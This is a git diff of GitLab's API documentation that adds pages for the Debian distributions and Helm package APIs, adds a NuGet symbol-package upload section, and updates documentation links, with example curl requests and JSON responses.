b/doc/api/packages/debian_group_distributions.md @@ -0,0 +1,222 @@ +--- +stage: Package +group: Package +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Debian group distributions API **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/5835) in GitLab 14.0. + +See the [Debian package registry documentation](../../user/packages/debian_repository/index.md) +for more information about working with Debian packages. + +## Enable Debian repository feature + +Debian repository support is gated behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) +can opt to enable it. + +To enable it: + +```ruby +Feature.enable(:debian_packages) +``` + +To disable it: + +```ruby +Feature.disable(:debian_packages) +``` + +## List all Debian distributions in a group + +Lists Debian distributions in the given group. + +```plaintext +GET /groups/:id/debian_distributions +``` + +| Attribute | Type | Required | Description | +| ---------- | --------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](../index.md#namespaced-path-encoding). | +| `codename` | string | no | Filter with specific `codename`. | +| `suite` | string | no | Filter with specific `suite`. | + +```shell +curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions" +``` + +Example response: + +```json +[ + { + "id": 1, + "codename": "unstable", + "suite": null, + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": null, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] + } +] +``` + +## Single Debian group distribution + +Gets a single Debian group distribution. + +```plaintext +GET /groups/:id/debian_distributions/:codename +``` + +| Attribute | Type | Required | Description | +| ---------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | integer | yes | The `codename` of a distribution. | + +```shell +curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions/unstable" +``` + +Example response: + +```json +{ + "id": 1, + "codename": "unstable", + "suite": null, + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": null, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] +} +``` + +## Create a Debian group distribution + +Creates a Debian group distribution. + +```plaintext +POST /groups/:id/debian_distributions +``` + +| Attribute | Type | Required | Description | +| ----------------------------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | string | yes | The codename of a Debian distribution. | +| `suite` | string | no | The suite of the new Debian distribution. | +| `origin` | string | no | The origin of the new Debian distribution. | +| `label` | string | no | The label of the new Debian distribution. | +| `version` | string | no | The version of the new Debian distribution. | +| `description` | string | no | The description of the new Debian distribution. | +| `valid_time_duration_seconds` | integer | no | The valid time duration (in seconds) of the new Debian distribution. | +| `components` | architectures | no | The new Debian distribution's list of components. | +| `architectures` | architectures | no | The new Debian distribution's list of architectures. | + +```shell +curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions?codename=unstable" +``` + +Example response: + +```json +{ + "id": 1, + "codename": "unstable", + "suite": null, + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": null, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] +} +``` + +## Update a Debian group distribution + +Updates a Debian group distribution. + +```plaintext +PUT /groups/:id/debian_distributions/:codename +``` + +| Attribute | Type | Required | Description | +| ----------------------------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | string | yes | The Debian distribution's new codename. | +| `suite` | string | no | The Debian distribution's new suite. | +| `origin` | string | no | The Debian distribution's new origin. | +| `label` | string | no | The Debian distribution's new label. | +| `version` | string | no | The Debian distribution's new version. | +| `description` | string | no | The Debian distribution's new description. | +| `valid_time_duration_seconds` | integer | no | The Debian distribution's new valid time duration (in seconds). | +| `components` | architectures | no | The Debian distribution's new list of components. | +| `architectures` | architectures | no | The Debian distribution's new list of architectures. | + +```shell +curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions/unstable?suite=new-suite&valid_time_duration_seconds=604800" +``` + +Example response: + +```json +{ + "id": 1, + "codename": "unstable", + "suite": "new-suite", + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": 604800, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] +} +``` + +## Delete a Debian group distribution + +Deletes a Debian group distribution. + +```plaintext +DELETE /groups/:id/debian_distributions/:codename +``` + +| Attribute | Type | Required | Description | +| ---------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | integer | yes | The codename of the Debian distribution. | + +```shell +curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions/unstable" +``` diff --git a/doc/api/packages/debian_project_distributions.md b/doc/api/packages/debian_project_distributions.md new file mode 100644 index 00000000000..aad5558dcba --- /dev/null +++ b/doc/api/packages/debian_project_distributions.md @@ -0,0 +1,222 @@ +--- +stage: Package +group: Package +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Debian project distributions API **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/5835) in GitLab 14.0. + +See the [Debian package registry documentation](../../user/packages/debian_repository/index.md) +for more information about working with Debian packages. + +## Enable Debian repository feature + +Debian repository support is gated behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) +can opt to enable it. + +To enable it: + +```ruby +Feature.enable(:debian_packages) +``` + +To disable it: + +```ruby +Feature.disable(:debian_packages) +``` + +## List all Debian distributions in a project + +Lists Debian distributions in the given project. + +```plaintext +GET /projects/:id/debian_distributions +``` + +| Attribute | Type | Required | Description | +| ---------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding). | +| `codename` | string | no | Filter with a specific `codename`. | +| `suite` | string | no | Filter with a specific `suite`. | + +```shell +curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions" +``` + +Example response: + +```json +[ + { + "id": 1, + "codename": "unstable", + "suite": null, + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": null, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] + } +] +``` + +## Single Debian project distribution + +Gets a single Debian project distribution. + +```plaintext +GET /projects/:id/debian_distributions/:codename +``` + +| Attribute | Type | Required | Description | +| ---------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | integer | yes | The `codename` of a distribution. | + +```shell +curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions/unstable" +``` + +Example response: + +```json +{ + "id": 1, + "codename": "unstable", + "suite": null, + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": null, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] +} +``` + +## Create a Debian project distribution + +Creates a Debian project distribution. + +```plaintext +POST /projects/:id/debian_distributions +``` + +| Attribute | Type | Required | Description | +| ----------------------------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | string | yes | The Debian distribution's codename. | +| `suite` | string | no | The new Debian distribution's suite. | +| `origin` | string | no | The new Debian distribution's origin. | +| `label` | string | no | The new Debian distribution's label. | +| `version` | string | no | The new Debian distribution's version. | +| `description` | string | no | The new Debian distribution's description. | +| `valid_time_duration_seconds` | integer | no | The new Debian distribution's valid time duration (in seconds). | +| `components` | architectures | no | The new Debian distribution's list of components. | +| `architectures` | architectures | no | The new Debian distribution's list of architectures. | + +```shell +curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions?codename=unstable" +``` + +Example response: + +```json +{ + "id": 1, + "codename": "unstable", + "suite": null, + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": null, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] +} +``` + +## Update a Debian project distribution + +Updates a Debian project distribution. + +```plaintext +PUT /projects/:id/debian_distributions/:codename +``` + +| Attribute | Type | Required | Description | +| ----------------------------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | string | yes | The Debian distribution's codename. | +| `suite` | string | no | The Debian distribution's new suite. | +| `origin` | string | no | The Debian distribution's new origin. | +| `label` | string | no | The Debian distribution's new label. | +| `version` | string | no | The Debian distribution's new version. | +| `description` | string | no | The Debian distribution's new description. | +| `valid_time_duration_seconds` | integer | no | The Debian distribution's new valid time duration (in seconds). | +| `components` | architectures | no | The Debian distribution's new list of components. | +| `architectures` | architectures | no | The Debian distribution's new list of architectures. | + +```shell +curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions/unstable?suite=new-suite&valid_time_duration_seconds=604800" +``` + +Example response: + +```json +{ + "id": 1, + "codename": "unstable", + "suite": "new-suite", + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": 604800, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] +} +``` + +## Delete a Debian project distribution + +Deletes a Debian project distribution. + +```plaintext +DELETE /projects/:id/debian_distributions/:codename +``` + +| Attribute | Type | Required | Description | +| ---------- | -------------- | -------- | ----------- | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding) owned by the authenticated user. | +| `codename` | integer | yes | The Debian distribution's codename. | + +```shell +curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions/unstable" +``` diff --git a/doc/api/packages/helm.md b/doc/api/packages/helm.md new file mode 100644 index 00000000000..a76fa9d3755 --- /dev/null +++ b/doc/api/packages/helm.md @@ -0,0 +1,96 @@ +--- +stage: Package +group: Package +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Helm API + +This is the API documentation for [Helm](../../user/packages/helm_repository/index.md). + +WARNING: +This API is used by the Helm-related package clients such as [Helm](https://helm.sh/) +and [`helm-push`](https://github.com/chartmuseum/helm-push/#readme), +and is generally not meant for manual consumption. This API is under development and is not ready +for production use due to limited functionality. + +For instructions on how to upload and install Helm packages from the GitLab +Package Registry, see the [Helm registry documentation](../../user/packages/helm_repository/index.md). + +NOTE: +These endpoints do not adhere to the standard API authentication methods. +See the [Helm registry documentation](../../user/packages/helm_repository/index.md) +for details on which headers and token types are supported. + +## Download a chart index + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/62757) in GitLab 14.1. + +Download a chart index: + +```plaintext +GET projects/:id/packages/helm/:channel/index.yaml +``` + +| Attribute | Type | Required | Description | +| --------- | ------ | -------- | ----------- | +| `id` | string | yes | The ID or full path of the project. | +| `channel` | string | yes | Helm repository channel. | + +```shell +curl --user <username>:<personal_access_token> \ + https://gitlab.example.com/api/v4/projects/1/packages/helm/stable/index.yaml +``` + +Write the output to a file: + +```shell +curl --user <username>:<personal_access_token> \ + https://gitlab.example.com/api/v4/projects/1/packages/helm/stable/index.yaml \ + --remote-name +``` + +## Download a chart + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61014) in GitLab 14.0. + +Download a chart: + +```plaintext +GET projects/:id/packages/helm/:channel/charts/:file_name.tgz +``` + +| Attribute | Type | Required | Description | +| ----------- | ------ | -------- | ----------- | +| `id` | string | yes | The ID or full path of the project. | +| `channel` | string | yes | Helm repository channel. | +| `file_name` | string | yes | Chart file name. | + +```shell +curl --user <username>:<personal_access_token> \ + https://gitlab.example.com/api/v4/projects/1/packages/helm/stable/charts/mychart.tgz \ + --remote-name +``` + +## Upload a chart + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64814) in GitLab 14.1. + +Upload a chart: + +```plaintext +POST projects/:id/packages/helm/api/:channel/charts +``` + +| Attribute | Type | Required | Description | +| --------- | ------ | -------- | ----------- | +| `id` | string | yes | The ID or full path of the project. | +| `channel` | string | yes | Helm repository channel. | +| `chart` | file | yes | Chart (as `multipart/form-data`). | + +```shell +curl --request POST \ + --form 'chart=@mychart.tgz' \ + --user <username>:<personal_access_token> \ + https://gitlab.example.com/api/v4/projects/1/packages/helm/api/stable/charts +``` diff --git a/doc/api/packages/nuget.md b/doc/api/packages/nuget.md index bbcb2cb9bc4..d19e2dfa65b 100644 --- a/doc/api/packages/nuget.md +++ b/doc/api/packages/nuget.md @@ -102,6 +102,30 @@ curl --request PUT \ "https://gitlab.example.com/api/v4/projects/1/packages/nuget" ``` +## Upload a symbol package file + +> Introduced in GitLab 12.8. + +Upload a NuGet symbol package file (`.snupkg`): + +```plaintext +PUT projects/:id/packages/nuget/symbolpackage +``` + +| Attribute | Type | Required | Description | +| ----------------- | ------ | -------- | ----------- | +| `id` | string | yes | The ID or full path of the project. | +| `package_name` | string | yes | The name of the package. | +| `package_version` | string | yes | The version of the package. | +| `package_filename`| string | yes | The name of the file. | + +```shell +curl --request PUT \ + --upload-file path/to/mynugetpkg.1.3.0.17.snupkg \ + --user <username>:<personal_access_token> \ + "https://gitlab.example.com/api/v4/projects/1/packages/nuget/symbolpackage" +``` + ## Route prefix For the remaining routes, there are two sets of identical routes that each make requests in @@ -193,6 +217,11 @@ Example response: "@id": "https://gitlab.example.com/api/v4/projects/1/packages/nuget", "@type": "PackagePublish/2.0.0", "comment": "Push and delete (or unlist) packages." + }, + { + "@id": "https://gitlab.example.com/api/v4/projects/1/packages/nuget/symbolpackage", + "@type": "SymbolPackagePublish/4.9.0", + "comment": "Push symbol packages." } ] } diff --git a/doc/api/packages/pypi.md b/doc/api/packages/pypi.md index 77ba028c447..dd301e9fab8 100644 --- a/doc/api/packages/pypi.md +++ b/doc/api/packages/pypi.md @@ -9,7 +9,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w This is the API documentation for [PyPI Packages](../../user/packages/pypi_repository/index.md). WARNING: -This API is used by the [PyPI package manager client](https://pypi.apache.org/) +This API is used by the [PyPI package manager client](https://pypi.org/) and is generally not meant for manual consumption. For instructions on how to upload and install PyPI packages from the GitLab diff --git a/doc/api/pages.md b/doc/api/pages.md index 0a79d23b51e..ef6523520de 100644 --- a/doc/api/pages.md +++ b/doc/api/pages.md @@ -20,7 +20,7 @@ DELETE /projects/:id/pages | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --request 'DELETE' --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/2/pages" diff --git a/doc/api/pages_domains.md b/doc/api/pages_domains.md index fbea365e3d5..46d92db9853 100644 --- a/doc/api/pages_domains.md +++ b/doc/api/pages_domains.md @@ -47,7 +47,7 @@ GET /projects/:id/pages/domains | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/pages/domains" @@ -83,7 +83,7 @@ GET /projects/:id/pages/domains/:domain | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `domain` | string | yes | The custom domain indicated by the user | ```shell @@ -125,7 +125,7 @@ POST /projects/:id/pages/domains | Attribute | Type | Required | Description | | -------------------| -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `domain` | string | yes | The custom domain indicated by the user | | `auto_ssl_enabled` | boolean | no | Enables [automatic generation](../user/project/pages/custom_domains_ssl_tls_certification/lets_encrypt_integration.md) of SSL certificates issued by Let's Encrypt for custom domains. | | `certificate` | file/string | no | The certificate in PEM format with intermediates following in most specific to least specific order.| @@ -178,7 +178,7 @@ PUT /projects/:id/pages/domains/:domain | Attribute | Type | Required | Description | | ------------------ | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `domain` | string | yes | The custom domain indicated by the user | | `auto_ssl_enabled` | boolean | no | Enables [automatic generation](../user/project/pages/custom_domains_ssl_tls_certification/lets_encrypt_integration.md) of SSL certificates issued by Let's Encrypt for custom domains. | | `certificate` | file/string | no | The certificate in PEM format with intermediates following in most specific to least specific order.| @@ -256,7 +256,7 @@ DELETE /projects/:id/pages/domains/:domain | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `domain` | string | yes | The custom domain indicated by the user | ```shell diff --git a/doc/api/pipeline_schedules.md b/doc/api/pipeline_schedules.md index afb5d434fe7..74f96e5374e 100644 --- a/doc/api/pipeline_schedules.md +++ b/doc/api/pipeline_schedules.md @@ -18,7 +18,7 @@ GET /projects/:id/pipeline_schedules | Attribute | Type | required | Description | |-----------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `scope` | string | no | The scope of pipeline schedules, one of: `active`, `inactive` | ```shell @@ -59,7 +59,7 @@ GET /projects/:id/pipeline_schedules/:pipeline_schedule_id | Attribute | Type | required | Description | |--------------|---------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID | ```shell @@ -111,7 +111,7 @@ POST /projects/:id/pipeline_schedules | Attribute | Type | required | Description | |-----------------|----------------|----------|-------------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `description` | string | yes | The description of the pipeline schedule. | | `ref` | string | yes | The branch or tag name that is triggered. | | `cron` | string | yes | The [cron](https://en.wikipedia.org/wiki/Cron) schedule, for example: `0 1 * * *`. | @@ -157,7 +157,7 @@ PUT /projects/:id/pipeline_schedules/:pipeline_schedule_id | Attribute | Type | required | Description | |------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID. | | `description` | string | no | The description of the pipeline schedule. | | `ref` | string | no | The branch or tag name that is triggered. | @@ -208,7 +208,7 @@ POST /projects/:id/pipeline_schedules/:pipeline_schedule_id/take_ownership | Attribute | Type | required | Description | |---------------|---------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID | ```shell @@ -253,7 +253,7 @@ DELETE /projects/:id/pipeline_schedules/:pipeline_schedule_id | Attribute | Type | required | Description | |----------------|---------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID | ```shell @@ -301,7 +301,7 @@ POST /projects/:id/pipeline_schedules/:pipeline_schedule_id/play | Attribute | Type | required | Description | | ---------------- | --------- | ---------- | -------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID | Example request: @@ -330,7 +330,7 @@ POST /projects/:id/pipeline_schedules/:pipeline_schedule_id/variables | Attribute | Type | required | Description | |------------------------|----------------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID | | `key` | string | yes | The `key` of a variable; must have no more than 255 characters; only `A-Z`, `a-z`, `0-9`, and `_` are allowed | | `value` | string | yes | The `value` of a variable | @@ -359,7 +359,7 @@ PUT /projects/:id/pipeline_schedules/:pipeline_schedule_id/variables/:key | Attribute | Type | required | Description | |------------------------|----------------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID | | `key` | string | yes | The `key` of a variable | | `value` | string | yes | The `value` of a variable | @@ -389,7 +389,7 @@ DELETE /projects/:id/pipeline_schedules/:pipeline_schedule_id/variables/:key | Attribute | Type | required | Description | |------------------------|----------------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_schedule_id` | integer | yes | The pipeline schedule ID | | `key` | string | yes | The `key` of a variable | diff --git a/doc/api/pipeline_triggers.md b/doc/api/pipeline_triggers.md index 94122a40b2d..2fe3f487ebc 100644 --- a/doc/api/pipeline_triggers.md +++ b/doc/api/pipeline_triggers.md @@ -6,7 +6,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Pipeline triggers API **(FREE)** -You can read more about [triggering pipelines through the API](../ci/triggers/README.md). +You can read more about [triggering pipelines through the API](../ci/triggers/index.md). ## List project triggers @@ -18,7 +18,7 @@ GET /projects/:id/triggers | Attribute | Type | required | Description | |-----------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/triggers" @@ -48,7 +48,7 @@ GET /projects/:id/triggers/:trigger_id | Attribute | Type | required | Description | |--------------|---------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `trigger_id` | integer | yes | The trigger ID | ```shell @@ -77,7 +77,7 @@ POST /projects/:id/triggers | Attribute | Type | required | Description | |---------------|---------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `description` | string | yes | The trigger name | ```shell @@ -107,7 +107,7 @@ PUT /projects/:id/triggers/:trigger_id | Attribute | Type | required | Description | |---------------|---------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `trigger_id` | integer | yes | The trigger ID | | `description` | string | no | The trigger name | @@ -138,7 +138,7 @@ DELETE /projects/:id/triggers/:trigger_id | Attribute | Type | required | Description | |----------------|---------|----------|--------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `trigger_id` | integer | yes | The trigger ID | ```shell diff --git a/doc/api/pipelines.md b/doc/api/pipelines.md index 57c356ccf29..7d433923865 100644 --- a/doc/api/pipelines.md +++ b/doc/api/pipelines.md @@ -11,7 +11,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/36494) in GitLab 13.3. Endpoints that request information about a single pipeline return data for any pipeline. -Before 13.3, requests for [child pipelines](../ci/parent_child_pipelines.md) returned +Before 13.3, requests for [child pipelines](../ci/pipelines/parent_child_pipelines.md) returned a 404 error. ## Pipelines pagination @@ -19,7 +19,7 @@ a 404 error. By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ## List project pipelines @@ -29,7 +29,7 @@ GET /projects/:id/pipelines | Attribute | Type | Required | Description | |-----------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `scope` | string | no | The scope of pipelines, one of: `running`, `pending`, `finished`, `branches`, `tags` | | `status` | string | no | The status of pipelines, one of: `created`, `waiting_for_resource`, `preparing`, `pending`, `running`, `success`, `failed`, `canceled`, `skipped`, `manual`, `scheduled` | | `ref` | string | no | The ref of pipelines | @@ -81,7 +81,7 @@ GET /projects/:id/pipelines/:pipeline_id | Attribute | Type | Required | Description | |------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_id` | integer | yes | The ID of a pipeline | ```shell @@ -128,7 +128,7 @@ GET /projects/:id/pipelines/:pipeline_id/variables | Attribute | Type | Required | Description | |------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_id` | integer | yes | The ID of a pipeline | ```shell @@ -164,7 +164,7 @@ GET /projects/:id/pipelines/:pipeline_id/test_report | Attribute | Type | Required | Description | |------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_id` | integer | yes | The ID of a pipeline | Sample request: @@ -215,7 +215,7 @@ POST /projects/:id/pipeline | Attribute | Type | Required | Description | |-------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `ref` | string | yes | Reference to commit | | `variables` | array | no | An array containing the variables available in the pipeline, matching the structure `[{ 'key': 'UPLOAD_TO_S3', 'variable_type': 'file', 'value': 'true' }]` | @@ -263,7 +263,7 @@ POST /projects/:id/pipelines/:pipeline_id/retry | Attribute | Type | Required | Description | |------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_id` | integer | yes | The ID of a pipeline | ```shell @@ -310,7 +310,7 @@ POST /projects/:id/pipelines/:pipeline_id/cancel | Attribute | Type | Required | Description | |------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| 